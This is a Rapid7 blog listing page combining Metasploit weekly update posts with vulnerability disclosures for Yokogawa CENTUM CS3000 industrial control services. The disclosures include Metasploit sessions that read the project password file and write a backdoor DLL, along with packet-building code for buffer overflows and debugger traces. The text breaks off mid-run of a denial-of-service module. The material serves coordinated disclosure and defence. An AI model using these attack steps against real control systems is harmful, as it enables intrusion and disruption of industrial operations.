Rapid7 Blog

Zero-day  

Weekly Metasploit Wrapup: SMB File Shares

Sharing is Caring One of the nits we've all had to pick with Metasploit is that when you have a module that involves getting a client to connect to an evil SMB server to fetch a file, the strategy usually used involved generating the file…

Sharing is Caring One of the nits we've all had to pick with Metasploit is that when you have a module that involves getting a client to connect to an evil SMB server to fetch a file, the strategy usually used involved generating the file with a module then serving that up on your own Samba or Windows share. This worked, of course, but what a hassle. Who wants to run two things? Nobody! Well, those days are now behind us, thanks largely to the Herculean efforts of Metasploit community contributor Matthew 0x41414141 Hall. This last week, we landed #3074, one of the longest running pull requests we've had. SMB itself is pretty complicated, as anyone who's worked with this protocol can attest, so it's no wonder this took a year or so of gnashing and hacking. Coding up a SMB file server in Metasploit-flavored Ruby was a huge feat, and I'm super happy that Matthew stuck with it. He worked with the Metasploit open source community (especially Juan there at the end), and hauled this thing over the finish line, all the while with an amazingly positive attitude. So, now that we have the mixin, I'm sure there are a bunch of modules that could use a retrofit to use it. If you're looking for some way to contribute to the Framework, that'd be a fine place to start. New Modules Since the last blog post, we've added two new exploits to the Metasploit Framework. The first is a Flash exploit from Juan Vazquez, who's taken on Flash reversing and exploitation as a personal mission in the light of the run of recent Flash 0-days. Since these bugs first became public when they were discovered as part of active attacks, it's important to test to ensure that your end-user constituency has a reasonable update schedule. The other involves the sinister-sounding Nvidia Mental Ray Satellite Service. Turns out, this is not an orbital mind control platform, but rendering software used by tons of movie studios. So, more ground-based mind control, I guess. The Metasploit module was implemented by Ben Meatballs Campbell, based on the research by Luigi Auriemma and Donato Ferrante. Incidentally, it uses 0x41414141's SMB file server mixin, so it's got that going for it now, which is nice. Granted, this sort of rendering software suite isn't likely to come up in your average engagement, but if you're in the business of running this kind of gear, you'll probably want to double-check your network separation -- while it was disclosed a little while back, there's no indication from the vendor that there's been a patch. But really, how often do movie studios get compromised, anyway? Probably no big deal, right? Exploit modules Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free by juan vazquez, Unknown, and hdarwin exploits CVE-2015-0311 Nvidia Mental Ray Satellite Service Arbitrary DLL Injection by Ben Campbell, Donato Ferrante, and Luigi Auriemm You should also check out what's included in this week's packaged release by reading Thao's most excellent release notes.

R7-2014-10 Disclosure: Yokogawa CENTUM CS3000 BKBCopyD.exe File System Access

This blog post represents the final disclosure of the the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) on their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the…

This blog post represents the final disclosure of the the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) on their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly. Let's start with a quote from the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability." Vulnerability Summary The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. There is a lack of authentication which makes possible to abuse several operations provided by the service in order to: Leak the CENTUM project database location. Read arbitrary files. Write arbitrary files. Reading and Writing to the file system will happen with the privileges of the CENTUM user. Disclosure Timeline DateDescriptionMarch, 2014Client-Attorney Relationship Established between Cipherlaw Group and Rapid7April 14, 2014Vulnerability details disclosed to attorneyMay 1, 2014Details offered to vendorJune 25, 2014Details disclosed to CERTsAug 9, 2014Details, Metasploit module published as PR 3637 Technical Analysis The “BKBCopyD.exe” service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below: PMODE: this command allows getting the value for environment variables. It includes the MR_DBPATH variable with the project path in the file system or network resource. RETR: this command allows reading arbitrary files from the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism. STOR: this command allows storing arbitrary files in the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism. Exploitation A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where is possible to leak the database location, retrieve and store arbitrary files: Retrieving the database location with PMODE: msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63 RHOST => 172.17.1.63 msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE action => PMODE msf auxiliary(yokogawa_bkbcopyd_client) > run [*] 172.17.1.63: 20111 - Sending PMODE packet... [+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful Retrieving the project password database location with RETR: msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR action => RETR msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc msf auxiliary(yokogawa_bkbcopyd_client) > run [*] 172.17.1.63: 20111 - Sending RETR packet... [*] Server started. [*] 172.17.1.63 - Getting data... [+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin saved! [*] 172.17.1.63 - Getting data... [*] Server stopped. [*] Auxiliary module execution completed msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin [*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin #YDCS_PASSWORD PROJECT: MYPJT OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083 ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083 ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083 PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083 TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083 #!2712db741f4af7718f74fd179deacbe3msf Placing remote files with STOR: msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR action => STOR msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll LPATH => /tmp/backdoor.dll msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll msf auxiliary(yokogawa_bkbcopyd_client) > run [*] 172.17.1.63: 20111 - Sending STOR packet... [*] Server started. [*] 172.17.1.63 - Sending data... [*] Server stopped. [*] Auxiliary module execution completed msf auxiliary(yokogawa_bkbcopyd_client) > Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Weekly Metasploit Update: More Meterpreters!

Meterpreter for All The PlatformsThis week is pretty exciting for us, since it's not every day we give out commit rights to the Rapid7 Metasploit repo. I'm very happy to report that Tim Wright has agreed to step up and help out with moving Meterpreter…

Meterpreter for All The PlatformsThis week is pretty exciting for us, since it's not every day we give out commit rights to the Rapid7 Metasploit repo. I'm very happy to report that Tim Wright has agreed to step up and help out with moving Meterpreter research and development forward, focusing mainly on the Java and Android implementations.Many Metasploit users are familiar with Meterpreter for Windows, since it's the default payload for Microsoft systems and effectively the reference implementation. In fact, Metasploit contributor OJ Reeves will be talking about Meterpreter internals on Friday at AusCERT2014, so if you're in the area or otherwise attending, you should certainly check it out.That said, many people also don't know that Meterpreter is more than just a Windows rootkit / backdoor / persistence agent for Windows.  It's a whole protocol and system for interacting with compromised machines, and has always been intended to be cross-platform. Today, we have versions written in POSIX, PHP, Python, and Java/Android. It's that last one that's been getting a lot of attention lately, primarily by community contributors mihi, Anwar, and of course the aforementioned Tim.There are tons and tons of cool new features and boring old bugfixes just waiting to be committed in the many Meterpreters (Meterpreti?), so if you have ideas, or better, a willingness to run through test cases and documentation, or best, code to contribute to make those features a reality, I strongly urge you to get in touch with OJ, Tim, or really anyone from Rapid7, all of whom tend to hang out on the #metasploit channel on Freenode IRC.New ModulesWe have two new exploits this week: yet another Flash reverse engineered from yet another 0day found circulating in the wild, and another Yokogawa CS3000 module. Both are thanks to Juan Vazquez.Exploit modulesAdobe Flash Player Shader Buffer Overflow by juan vazquez and Unknown exploits CVE-2014-0515Yokogawa CS3000 BKESimmgr.exe Buffer Overflow by juan vazquez and Redsadic exploits CVE-2014-0782If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

IE 0-day, we got you covered

News broke this weekend of yet another IE 0-day under ("limited, targeted") exploitation in the wild.  Microsoft responded with an advisory, but no patches yet.  Given that the risk from the known exploit is mitigated by the usual defence in depth tactics I…

News broke this weekend of yet another IE 0-day under ("limited, targeted") exploitation in the wild.  Microsoft responded with an advisory, but no patches yet.  Given that the risk from the known exploit is mitigated by the usual defence in depth tactics I would not expect Microsoft to release an out of band patch, though a "fix it" type hotfix would be in keeping with Microsoft's recent tactics. The known exploit for this issue relies on Adobe Flash to be present and enabled.  Disabling or removing flash will block the known exploit, but does not address the root cause issue in Internet Explorer. To asses your exposure to this threat:Nexpose users can view affected systems in their environment from existing scan data using Dynamic Asset Groups. ControlsInsight users can examine which systems in their environment have the correct mitigations in place (including Flash disablement).Both products report Windows XP as an "Obsolete Version" (which is an automatic PCI failure).This 0-day is the first of what will inevitably be many issues to affect Windows XP in the post XP era.  Users still on XP have no choice but to upgrade in order to receive protection.  Of course, for Microsoft, Windows XP is already all but forgotten, in that, since it is no longer supported, it is not listed in the vulnerable systems. In a totally unscientific survey, looking at traffic to Rapid7.com, approximately 1% of our total web visitors identify as running Windows XP, but approximately 15% are running some version of IE.  We don't check for mitigations in place unless you ask us to.  Overall, this issue isn't all the different from any number of IE 0-days, we usually get three or four every year, except that it's the first in the post-XP world.  All the more reason for users to move to modern, supported, operating systems where advanced mitigation techniques are available.

R7-2013-19 Disclosure: Yokogawa CENTUM CS 3000 Vulnerabilities

On Saturday, March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. Today, as promised, we're publishing details for three of the vulnerabilities found in the product. For all of you who weren't able to attend RootedCON, we're…

On Saturday, March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. Today, as promised, we're publishing details for three of the vulnerabilities found in the product. For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability." Vulnerabilities Summary This report include details for three vulnerabilities found in different services used by the Yokogawa CENTUM CS3000 product in order to provide all its functionality. The vulnerabilities have been found in the version R3.08.50: R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow: The "BKCLogSvr.exe" service, started automatically with the system, listens by default on UDP/52302. By sending a specially sequence of packets to UDP/52302 it's possible to trigger a heap based buffer overflow, after an usage of uninitialized data, which allows to DoS the “BKCLogSvr.exe”, and on last instance, could allow execution of arbitrary code with SYSTEM privileges. R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow: The "BKHOdeq.exe" service, started when running the "FCS / Test Function" listens by default on TCP/20109 and TCP/20171. By sending a specially crafted packet to the port TCP/20171 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user. R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow: The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. By sending a specially crafted packet to the port TCP/20111 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user. Disclosure Timeline Date Description Dec 27, 2013 Initial disclosure to the vendor, Yokogawa Jan 13, 2014 Disclosure to CERT/CC Jan 14, 2014 CERT/CC assigns VU#479196 and forwards details to JPCERT Feb 03, 2014 CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities. ICS-CERT tracking #: ICS-VU-205881 JPCERT tracking #: JVNVU#98181377, JPECERT#98191377 Mar 07, 2014 Yokogawa advisory published (PDF). Mar 10, 2014 Metasploit modules published in Pull Request #3081 Technical Analysis R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow The BKLogSvr service listens on the UDP/52302, where expects packets sending logs, of no more than 1024 bytes, as can be seen on the next assembly from libbkclogsvr.dll (IDA notation): .text:61DC1283 push eax ; fromlen .text:61DC1284 mov eax, s .text:61DC1289 push ecx ; from .text:61DC128A push 0 ; flags .text:61DC128C lea edx, [esp+42Ch+buf] .text:61DC1290 push 400h ; len - packets including logs of 1024 bytes as much .text:61DC1295 push edx ; buf .text:61DC1296 push eax ; s .text:61DC1297 mov [esp+438h+fromlen], 10h .text:61DC129F call recvfrom There is a log packet sample: "\x96\x00\x00\x00\x00\x00\x00\x00\x48\x41\x53\x00\x00\x00\x00\x00" #........ HIS..... "\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x4f\x47\x00\x00\x00\x00\x00" #........ LOG..... "\x32\x30\x31\x33\x2f\x31\x31\x2f\x30\x39\x20\x31\x39\x3a\x32\x31" #2013/11/ 09 19:21 "\x3a\x34\x32\x20\x2b\x30\x31\x3a\x30\x30\x2c\x45\x56\x45\x4e\x54" #:42 +01: 00,EVENT "\x2c\x30\x78\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x3c\x42\x4f\x53" #,0x00000 000,<BOS "\x53\x56\x43\x3e\x20\x2c\x43\x3a\x5c\x43\x53\x33\x30\x30\x30\x5c" #SVC> ,C: \CS3000\ "\x50\x52\x4f\x47\x52\x41\x4d\x5c\x42\x4b\x48\x42\x6f\x73\x53\x76" #PROGRAM\ BKHBosSv "\x63\x2e\x65\x78\x65\x3a\x42\x6f\x73\x53\x76\x63\x4d\x61\x69\x6e" #c.exe:Bo sSvcMain "\x3a\x32\x36\x32\x33\x2c\x22\x73\x74\x61\x74\x75\x73\x20\x3a\x20" #:2623,"s tatus : "\x42\x4f\x4f\x54\x22\x22" #BOOT". The meaning of the several fields, according to our understanding, is it: Offset Field 0x0 Size 0x4 Unknown 0x8 Source 0x18 Level 0x20 Message The heap overflow occurs while handling the creation of the path where the log will be stored. The allocation for the memory happens on sub_61DC15A0 (IDA Notation), and it's a buffer of size 0x1b8: .text:61DC16A7 push 1B8h ; Size .text:61DC16AC call ds:malloc ; malloc memory: 0x1b8 When sending two consecutive packets with a long Level field, coalescing both Level and Message fields, an overflow happens after the allocation, in a strcpy style copy, resulting in the next crash: 0:005> g (c24.a6c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\libbkclogsvr.dll - eax=00000344 ebx=01846e48 ecx=000000ae edx=01846f9c esi=023af7a8 edi=01847000 eip=61dc1709 esp=023af708 ebp=0183de48 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 libbkclogsvr!BKCLogSvrLibResume+0x549: 61dc1709 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:004> db esi 023af7a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af7b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af7c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af7d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af7e8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af7f8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af808 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 023af818 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 0:004> db edi 01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847070 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:004> db edi - 10 01846ff0 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:004> !heap -p -a edi address 01847000 found in _DPH_HEAP_ROOT @ 17d1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 17d19a4: 1846e48 1b8 - 1846000 2000 7c918f01 ntdll!RtlAllocateHeap+0x00000e64 77c2c3c9 msvcrt!_heap_alloc+0x000000e0 77c2c3e7 msvcrt!_nh_malloc+0x00000013 77c2c42e msvcrt!malloc+0x00000027 61dc16b2 libbkclogsvr!BKCLogSvrLibResume+0x000004f2 At the moment of the overflow, the source of the data points to controlled data from the malformed Level/Message field. But in order to trigger the overflow, two consecutive packets are needed. The explanation is on the stack, and how the function doesn't take care of a correct initialization of local variables: .text:61DC16E3 lea edi, [esp+450h+var_440] ; origin for the copy comes from here, uninitialized stack is the root cause of the overflow being exploitable. .text:61DC16E7 xor eax, eax .text:61DC16E9 lea edx, [ebx+12Ch] .text:61DC16EF repne scasb .text:61DC16F1 not ecx .text:61DC16F3 sub edi, ecx .text:61DC16F5 push 104h .text:61DC16FA mov eax, ecx .text:61DC16FC mov esi, edi .text:61DC16FE shr ecx, 2 .text:61DC1701 mov edi, edx .text:61DC1703 lea edx, [ebx+154h] .text:61DC1709 rep movsd ; overflow happens here The origin for the copy is a local variable, stored on the stack, which has not been initialized previously. So if malicious data can be stored on the stack, the overflow happens. It's possible to put malicious data on the stack by sending consecutive malicious packets. As has been already explained, in order to exploit the dangerous strcpy controlled data need to be stored in the stack previously in order to abuse the uninitialized local variables. In order to accomplish it two consecutive, malformed packets, can be sent to the server: test = [1024].pack("V") # packet length test << "AAAA" # Unknown test << "SOURCE\x00\x00" # Source test << "\x00" * 8 # Padding test << "B" * (1024 - test.length) # Level & Message coalesced When the first packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy): 0:005> g Breakpoint 0 hit eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=005c41c0 eip=61dc16e3 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 libbkclogsvr!BKCLogSvrLibResume+0x523: 61dc16e3 8d7c2410 lea edi,[esp+10h] 0:004> t eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=00a9f71c eip=61dc16e7 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 libbkclogsvr!BKCLogSvrLibResume+0x527: 61dc16e7 33c0 xor eax,eax 0:004> db edi 00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 00 00 SOURCEBBBBBBBB.. 00a9f72c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00a9f73c 00 04 00 00 41 41 41 41-53 4f 55 52 43 45 00 00 ....AAAASOURCE.. 00a9f74c 00 00 00 00 00 00 00 00-42 42 42 42 42 42 42 42 ........BBBBBBBB 00a9f75c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00a9f76c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00a9f77c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00a9f78c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ Later, while processing this first packet, the stack is filled with the packet contents. It occurs when flushing the contents of the log: .text:61DC1572 call ebx ; fflush ; Here is where the stack is filled with controlled data .text:61DC1572 ; .text:61DC1572 ; ChildEBP RetAddr Args to Child .text:61DC1572 ; 00a9fab8 77c3035a 00000003 005c4298 000003e0 msvcrt!_write_lk+0xd6 .text:61DC1572 ; 00a9faf4 77c3edb2 00000003 005c4298 000003e0 msvcrt!_write+0x57 .text:61DC1572 ; 00a9fb14 77c3edf3 77c5fce0 00000000 00a9fb58 msvcrt!_flush+0x35 .text:61DC1572 ; 00a9fb24 77c3ef26 77c5fce0 77c40ed3 7c802530 msvcrt!_fflush_lk+0xf .text:61DC1572 ; 00a9fb58 61dc1574 77c5fce0 00a9fb84 77c5fce0 msvcrt!fflush+0x30 .text:61DC1572 ; WARNING: Stack unwind information not available. Following frames may be wrong. .text:61DC1572 ; 00a9fb60 00a9fb84 77c5fce0 0089fc60 005c3eb8 libbkclogsvr!BKCLogSvrLibResume+0x3b4 When the second packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy): 0:005> g Breakpoint 0 hit eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=005c53f8 eip=61dc16e3 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 libbkclogsvr!BKCLogSvrLibResume+0x523: 61dc16e3 8d7c2410 lea edi,[esp+10h] 0:004> t eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=00a9f71c eip=61dc16e7 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 libbkclogsvr!BKCLogSvrLibResume+0x527: 61dc16e7 33c0 xor eax,eax 0:004> db edi 00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 42 42 SOURCEBBBBBBBBBB 00a9f72c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f73c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f74c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f75c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f76c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f77c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 00a9f78c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 0:004> g (430.f50): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\LibBKCCommon.dll - eax=00000000 ebx=00000104 ecx=ffffffff edx=00a9f3ec esi=00a9fa60 edi=42424242 eip=61e51708 esp=00a9f3d8 ebp=005c5248 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286 LibBKCCommon!BKCGetLogDir+0x78: 61e51708 f2ae repne scas byte ptr es:[edi] R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow The vulnerability exists in the function “sub_41EB60” (IDA notation), which makes an insecure memory copy, while reading lines from user controlled input: int __cdecl vulnerable_sub_41EB60(int a1, int a2) { int v2; // eax@1 char v3; // cl@1 int result; // eax@3 int i; // edx@5 v2 = a2; v3 = *(_BYTE *)a2; if ( *(_BYTE *)a2 != ':' || *(_BYTE *)(a2 + 1) != ':' ) { for ( i = 0; v3 != '\n'; ++v2 ) // Dangerous loop, copying data to a stack buffer, until an end of line is found { if ( v3 == '\r' ) break; *(_BYTE *)(i + a1) = v3; // Byte copy to the stack, without having destination size into account. v3 = *(_BYTE *)(v2 + 1); ++i; } *(_BYTE *)(i + a1) = 0; for ( result = v2 + 1; *(_BYTE *)result == '\n' || *(_BYTE *)result == '\r'; ++result ) ; } else { result = 0; } return result; } The dangerous loop keeps copying data from the buffer pointed by the second argument, to the buffer pointed by the first argument, until a delimiter "\r" or "\n" is found. By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data: .text:0041DAAD mov eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes) .text:0041DAB4 lea ecx, [esp+2280h+var_1D14] ; static buffer size on the stack .text:0041DABB push eax .text:0041DABC push ecx .text:0041DABD call vulnerable_sub_41EB60 It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/20171. The packet must include a 16-byte fake header, where the bytes 4-7 allow setting an arbitrary data length: header = "ABCD" # iMark header << [data.length].pack("N") # Data length header << "IJKL" # NumSet header << "MN" # req header << "OP" # Unknown And the packet data, which can't contain "\r", "\n" or ":"" characters in order to trigger memory corruption. The arbitrary data must be longer than the static buffer size on the stack, of course. R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow The vulnerability exists on the function “sub_409EA0” (IDA notation), used while parsing several commands accepted for the BKBCopyD.exe TCP/20111 service. The vulnerable function tries to store a received command (and its argument) on memory. But it uses a dangerous vsprintf call to store a temporary copy of the full command on the stack, where the size of the buffer is no longer enough to store commands with long arguments: int dangerous_sub_409EA0(int a1, const char *Format, ...) { unsigned int v2; // edx@1 int result; // eax@3 char Dest; // [sp+8h] [bp-80h]@1 va_list va; // [sp+94h] [bp+Ch]@1 va_start(va, Format); vsprintf(&Dest, Format, va); // Dangerous vsprintf call v2 = strlen(&Dest); if ( (signed int)(dword_4230C0 + v2 + 1) > 1024 ) { dword_4230C4 = (int)dword_4230C8; dword_4230C0 = 0; } strcpy((char *)dword_4230C4, &Dest); result = dword_4230C4 + v2 + 1; dword_4230C4 += v2 + 1; dword_4230C0 += v2 + 1; return result; } The vulnerable function is reachable through several commands which accept user provided arguments like: STOR .text:00405ED0 push eax ; Args .text:00405ED1 push offset aStorS ; "STOR %s" .text:00405ED6 push ecx ; int .text:00405ED7 call dangerous_sub_409EA0 RETR .text:00405E1E push edx ; Args .text:00405E1F push offset aRetrS ; "RETR %s" .text:00405E24 push esi ; int .text:00405E25 call dangerous_sub_409EA0 PMODE .text:004060A2 push eax ; Args .text:004060A3 push offset aPmodeS ; "PMODE %s" .text:004060A8 push ecx ; int .text:004060A9 call dangerous_sub_409EA0 ATTR .text:004061D1 push ecx ; Args .text:004061D2 push offset aAttrS ; "ATTR %s" .text:004061D7 push esi ; int .text:004061D8 call dangerous_sub_409EA0 XATR .text:0040627A push edx ; Args .text:0040627B push offset aXatrS ; "XATR %s" .text:00406280 push esi ; int .text:00406281 call dangerous_sub_409EA0 By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data: .text:0041DAAD mov eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes) .text:0041DAB4 lea ecx, [esp+2280h+var_1D14] ; static buffer size on the stack .text:0041DABB push eax .text:0041DABC push ecx .text:0041DABD call vulnerable_sub_41EB60 Metasploit Modules R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow A proof of concept Metasploit module to trigger the Denial Of Service condition has been developed. However, a successful exploitation of the heap overflow could lead to arbitrary code execution with SYSTEM privileges. msf > use auxiliary/dos/scada/yokogawa_logsvr msf auxiliary(yokogawa_logsvr) > set RHOST 192.168.172.133 RHOST => 192.168.172.133 set verbose truemsf auxiliary(yokogawa_logsvr) > set verbose true verbose => true msf auxiliary(yokogawa_logsvr) > run [*] Sending 10 packets... [*] Sending 1/10... [*] Sending 2/10... [*] Sending 3/10... [*] 